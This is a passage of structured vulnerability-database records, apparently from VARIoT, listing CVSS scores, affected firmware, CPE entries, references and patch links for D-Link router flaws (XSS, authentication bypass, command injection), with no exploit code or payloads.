"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-14414",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14414",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-31795",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-581",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-105134",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "VULHUB",
"id": "VHN-105134"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/shareport.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \\342\\200\\230action\\342\\200\\231 parameter to the htdocs/web/wandetect.php file",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "VULHUB",
"id": "VHN-105134"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14414",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-31795",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105134",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "VULHUB",
"id": "VHN-105134"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"id": "VAR-201709-0585",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "VULHUB",
"id": "VHN-105134"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
}
]
},
"last_update_date": "2023-12-18T12:51:04.569000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235006"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105134"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "NVD",
"id": "CVE-2017-14414"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14414"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14414"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "VULHUB",
"id": "VHN-105134"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "VULHUB",
"id": "VHN-105134"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105134"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"date": "2017-09-13T17:29:00.243000",
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"date": "2017-09-20T00:00:00",
"db": "VULHUB",
"id": "VHN-105134"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"date": "2023-11-08T20:21:11.427000",
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Cross-site scripting vulnerability in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
],
"trust": 0.6
}
}
VAR-201901-1555
Vulnerability from variot - Updated: 2023-12-18 12:50plural D-Link Product devices have authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-822 C1, etc. are all wireless router products of D-Link. A security vulnerability exists in several D-Link products. An attacker could exploit this vulnerability to bypass authentication. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A with firmware prior to v2.22B03Beta ; DIR-880L A with firmware prior to v1.20B02Beta; DIR-850L B* with firmware prior to v2.22B03Beta
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201901-1555",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.22b02"
},
{
"model": "dir-822-us",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.10b06"
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.20b01"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.07.b08"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.21b07"
},
{
"model": "dir-822",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.10b06"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.21b01"
},
{
"model": "dir-822",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "3.11b01beta"
},
{
"model": "dir-822-us",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "3.11b01beta"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.21b08beta"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "2.22b03beta"
},
{
"model": "dir-880l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.20b02beta"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "NVD",
"id": "CVE-2018-20675"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.10b06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-822-us_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.10b06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-822-us:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21b07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.21b01",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:2.22b02:beta:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.07.b08",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:1.20b01:beta:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-20675"
}
]
},
"cve": "CVE-2018-20675",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-20675",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-131505",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-20675",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-20675",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201901-138",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-131505",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-20675",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-131505"
},
{
"db": "VULMON",
"id": "CVE-2018-20675"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "NVD",
"id": "CVE-2018-20675"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Product devices have authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-822 C1, etc. are all wireless router products of D-Link. A security vulnerability exists in several D-Link products. An attacker could exploit this vulnerability to bypass authentication. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A with firmware prior to v2.22B03Beta *; DIR-880L A* with firmware prior to v1.20B02Beta; DIR-850L B* with firmware prior to v2.22B03Beta",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "VULHUB",
"id": "VHN-131505"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-20675",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10101",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013973",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201901-138",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-131505",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-20675",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-131505"
},
{
"db": "VULMON",
"id": "CVE-2018-20675"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "NVD",
"id": "CVE-2018-20675"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"id": "VAR-201901-1555",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-131505"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:50:26.616000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L Rev. Ax/Bx, DIR-880L Rev.Ax, DIR-822 Rev. Cx :: Authenticated Command Bypass \u0026 Authenticated Remote Command Execution (RCE)",
"trust": 0.8,
"url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
},
{
"title": "Multiple D-Link Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=88326"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-131505"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "NVD",
"id": "CVE-2018-20675"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20675"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20675"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-131505"
},
{
"db": "VULMON",
"id": "CVE-2018-20675"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "NVD",
"id": "CVE-2018-20675"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-131505"
},
{
"db": "VULMON",
"id": "CVE-2018-20675"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"db": "NVD",
"id": "CVE-2018-20675"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-09T00:00:00",
"db": "VULHUB",
"id": "VHN-131505"
},
{
"date": "2019-01-09T00:00:00",
"db": "VULMON",
"id": "CVE-2018-20675"
},
{
"date": "2019-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"date": "2019-01-09T00:29:00.240000",
"db": "NVD",
"id": "CVE-2018-20675"
},
{
"date": "2019-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-29T00:00:00",
"db": "VULHUB",
"id": "VHN-131505"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULMON",
"id": "CVE-2018-20675"
},
{
"date": "2019-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013973"
},
{
"date": "2021-04-23T15:56:12.473000",
"db": "NVD",
"id": "CVE-2018-20675"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Authentication vulnerabilities in product devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013973"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-138"
}
],
"trust": 0.6
}
}
VAR-201901-1554
Vulnerability from variot - Updated: 2023-12-18 12:50plural D-Link Product devices contain a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-822C1 and others are all wireless router products of D-Link. A command execution vulnerability exists in several D-Link products that can be exploited by remote attackers to execute commands. D-Link DIR-822 C1, etc. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A with firmware prior to v1.21B08Beta ; DIR-850L B with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201901-1554",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
